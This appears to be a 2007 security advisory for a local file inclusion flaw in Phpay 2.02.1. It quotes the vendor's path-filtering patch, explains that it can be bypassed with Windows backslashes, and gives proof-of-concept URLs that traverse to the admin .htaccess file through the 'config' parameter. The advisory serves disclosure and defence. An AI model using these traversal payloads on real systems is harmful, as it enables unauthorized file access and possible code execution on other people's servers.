Phpay - Local File Inclusion

2007.12.20
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 5.8/10
Impact Subscore: 4.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

By Michael Brooks Vulnerability Type:Local File Inclusion Software: Phpay Homepage:http://sourceforge.net/projects/phpay/ Version Affected:2.02.1 Phpay has been affected by multiple local file include flaws, as a result this patch was written: $config = ereg_replace(":","", $config); $config = trim(ereg_replace("../","", $config)); $config = trim(ereg_replace("/","", $config)); if (($config=="")|| (!eregi(".inc.php",$config))){$config="config.inc.php"; echo "<!--$config-->\n";} if (!file_exists("$config")) { echo "panic: $config doesn't exist!! Did you backup it after installation? ..."; exit;} require("./$config"); To bypass this patch backslashes can be used instead of forward slashes on windows systems. Also .inc.php must exists *somewhere* in the string. Local File Include for windows only: http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\. htaccess or if magic_quotes_gpc is turned on: http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.hta ccess Remote code execution is accessible in the ./admin/ folder. The admin folder *should* be protected by a .htaccess file similar to osCommerce2. Vulnerable configuration: A there is a call to extract($_GET) so the exploit will work regardless of register_globals. Using Linux is a very good fix for this issue. Merry Christmas


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top